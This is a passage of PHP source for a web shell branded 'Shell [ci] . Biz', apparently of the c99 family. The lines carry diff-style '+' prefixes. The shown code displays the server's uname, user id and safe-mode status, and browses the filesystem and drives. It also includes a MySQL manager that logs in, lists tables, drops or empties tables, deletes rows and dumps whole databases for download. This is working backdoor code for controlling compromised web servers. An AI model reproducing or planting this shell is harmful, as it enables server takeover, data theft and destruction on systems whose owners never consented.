#CCCCCC; font-size: 11px;}body { background-color: #000000;} +</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>Shell [ci] . 
Biz <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = FALSE; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." 
(".$free_percent."%)</b>"; +} +echo "<br>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) 
{$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = 
array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" 
valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left 
panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." 
LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" 
name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td 
width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + 
echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") 
{$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo 
"<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a 
href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a 
href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." 
LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + 